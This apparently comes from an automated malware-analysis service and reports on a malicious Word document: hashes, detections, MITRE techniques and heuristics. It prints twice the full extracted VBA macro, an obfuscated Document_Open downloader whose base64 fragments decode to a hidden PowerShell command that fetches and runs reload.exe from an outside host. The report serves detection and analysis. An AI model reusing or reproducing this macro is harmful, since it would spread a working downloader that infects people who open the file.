Office (OLE) malware analysis — malicious · 0c73433e36b2e4e4

MALICIOUS

Office (OLE)

96.0 KB Created: 2017-07-24 20:05:00 Authoring application: Microsoft Office Word First seen: 2017-08-08

MD5: ef4c80b072ed3a1054fc1b13abea1d39 SHA-1: 1e3755260b2af2bcb71ace4f23fb017c2270858d SHA-256: 0c73433e36b2e4e42b909dfdace5a67acb35c138da1802481f5ed5be683271c9

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The critical heuristic 'OLE_VBA_SHELL' and the presence of VBA macros indicate malicious intent. The Document_Open macro contains obfuscated code that, when deobfuscated, reveals a PowerShell command to download and execute 'reload.exe' from 'the embedded link'. This suggests the document is a downloader for a secondary payload.

Heuristics 5

ClamAV: Doc.Trojan.Agent-6333895-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Agent-6333895-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell QRqx9, KMdylAK
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2111 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2111 bytes
SHA-256: `957cb357cf7f1dd0be274bd3930c530acd62c4e3c9f32298fd15030c76fc3dcf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() fYM2F = "CArICdcJyArICRuYW1lICsgJy5leGUnO2ZvcmVhY2goJ" teasSOom = "HVybCBpbiAkdXJscyl7dHJ5eyR3ZW" Oc6Lx4HR = fYM2F & teasSOom k3fngw = "JjbGllbnQuRG93bmxvYWRGaWxlKCR1cmwuVG9TdHJpbmcoKSwgJHBhd" enx2MdaU = "GgpO1N0YXJ0LVByb2Nlc3MgJHBhdGg7YnJlYWs7fWNhdGNoe3dyaXRlLWhvc3QgJF8" etU8SAd1 = k3fngw & enx2MdaU juALYN4j = "ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9t" Lx15qY = "OyR1cmxzID0gJ" GUR5FVYEv = juALYN4j & Lx15qY gdhHBv = "uRX" GixbU0j = "hjZXB0aW9uLk1lc3" mC7Kv = "NhZ2U7f" UaTnhjlM = "X0=" jRpFeXEd = gdhHBv & GixbU0j & mC7Kv & UaTnhjlM ldYmQ = "cG93ZXJzaGVsb" lT6OWJD = "CAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3" owPoCf4h = "JpcHQuU2" CcTsoP = "hlbGw7JHdlYmNsaWVudCA9IG5" pT49SUgw = ldYmQ & lT6OWJD & owPoCf4h & CcTsoP XAWskI = "2h" at2Nh = "0dHA6Ly9idXJnZXJwb3J0YWwu" EgdcR = "Y2l0eS9yZWxvYWQuZXhlJy5TcGxp" OgLtez = "dCgnLCcpOyRuYW1lID0gJHJhbmRvbS5uZXh0KDEsIDY1NTM2KTskcGF0aCA9ICRlbnY6dGVtc" HJxM3hB2 = XAWskI & at2Nh & EgdcR & OgLtez vZBe0qfh = pT49SUgw & GUR5FVYEv & HJxM3hB2 & Oc6Lx4HR & etU8SAd1 & jRpFeXEd Call runm(vZBe0qfh) End Sub Attribute VB_Name = "lARq3N" Sub runm(GidTv) IFwa60 = IZaP3Eh0(GidTv) zIkLADKy. _ uKM2Nl6 IFwa60, 0 End Sub Attribute VB_Name = "pEqp0" Function IZaP3Eh0(n0cC5O4w) As String Set pwEal3 = New MSXML2.DOMDocument Set jGPKahw2o = pwEal3.createElement(sPuLO) With jGPKahw2o .dataType = "bin.base64" .text = n0cC5O4w IZaP3Eh0 = jGPKahw2o.nodeTypedValue Y8xLT1U = -482 + 537 End With Set jGPKahw2o = Nothing Set pwEal3 = Nothing End Function Attribute VB_Name = "zIkLADKy" Public Const sPuLO = "BASE64" Public Sub uKM2Nl6(HC3MePac, KMdylAK) Dim QRqx9 As String QRqx9 = StrConv(HC3MePac, 64) Shell QRqx9, KMdylAK End Sub

SHA-256: 957cb357cf7f1dd0be274bd3930c530acd62c4e3c9f32298fd15030c76fc3dcf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
fYM2F = "CArICdcJyArICRuYW1lICsgJy5leGUnO2ZvcmVhY2goJ"
teasSOom = "HVybCBpbiAkdXJscyl7dHJ5eyR3ZW"
Oc6Lx4HR = fYM2F & teasSOom
k3fngw = "JjbGllbnQuRG93bmxvYWRGaWxlKCR1cmwuVG9TdHJpbmcoKSwgJHBhd"
enx2MdaU = "GgpO1N0YXJ0LVByb2Nlc3MgJHBhdGg7YnJlYWs7fWNhdGNoe3dyaXRlLWhvc3QgJF8"
etU8SAd1 = k3fngw & enx2MdaU
juALYN4j = "ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9t"
Lx15qY = "OyR1cmxzID0gJ"
GUR5FVYEv = juALYN4j & Lx15qY
gdhHBv = "uRX"
GixbU0j = "hjZXB0aW9uLk1lc3"
mC7Kv = "NhZ2U7f"
UaTnhjlM = "X0="
jRpFeXEd = gdhHBv & GixbU0j & mC7Kv & UaTnhjlM
ldYmQ = "cG93ZXJzaGVsb"
lT6OWJD = "CAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3"
owPoCf4h = "JpcHQuU2"
CcTsoP = "hlbGw7JHdlYmNsaWVudCA9IG5"
pT49SUgw = ldYmQ & lT6OWJD & owPoCf4h & CcTsoP
XAWskI = "2h"
at2Nh = "0dHA6Ly9idXJnZXJwb3J0YWwu"
EgdcR = "Y2l0eS9yZWxvYWQuZXhlJy5TcGxp"
OgLtez = "dCgnLCcpOyRuYW1lID0gJHJhbmRvbS5uZXh0KDEsIDY1NTM2KTskcGF0aCA9ICRlbnY6dGVtc"
HJxM3hB2 = XAWskI & at2Nh & EgdcR & OgLtez
vZBe0qfh = pT49SUgw & GUR5FVYEv & HJxM3hB2 & Oc6Lx4HR & etU8SAd1 & jRpFeXEd
Call runm(vZBe0qfh)
End Sub

Attribute VB_Name = "lARq3N"
Sub runm(GidTv)


IFwa60 = IZaP3Eh0(GidTv)

zIkLADKy. _
uKM2Nl6 IFwa60, 0

End Sub

Attribute VB_Name = "pEqp0"
Function IZaP3Eh0(n0cC5O4w) As String

Set pwEal3 = New MSXML2.DOMDocument
Set jGPKahw2o = pwEal3.createElement(sPuLO)

With jGPKahw2o
.dataType = "bin.base64"
.text = n0cC5O4w
IZaP3Eh0 = jGPKahw2o.nodeTypedValue
Y8xLT1U = -482 + 537
End With

Set jGPKahw2o = Nothing
Set pwEal3 = Nothing
End Function

Attribute VB_Name = "zIkLADKy"
Public Const sPuLO = "BASE64"
Public Sub uKM2Nl6(HC3MePac, KMdylAK)
Dim QRqx9 As String
QRqx9 = StrConv(HC3MePac, 64)

Shell QRqx9, KMdylAK

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.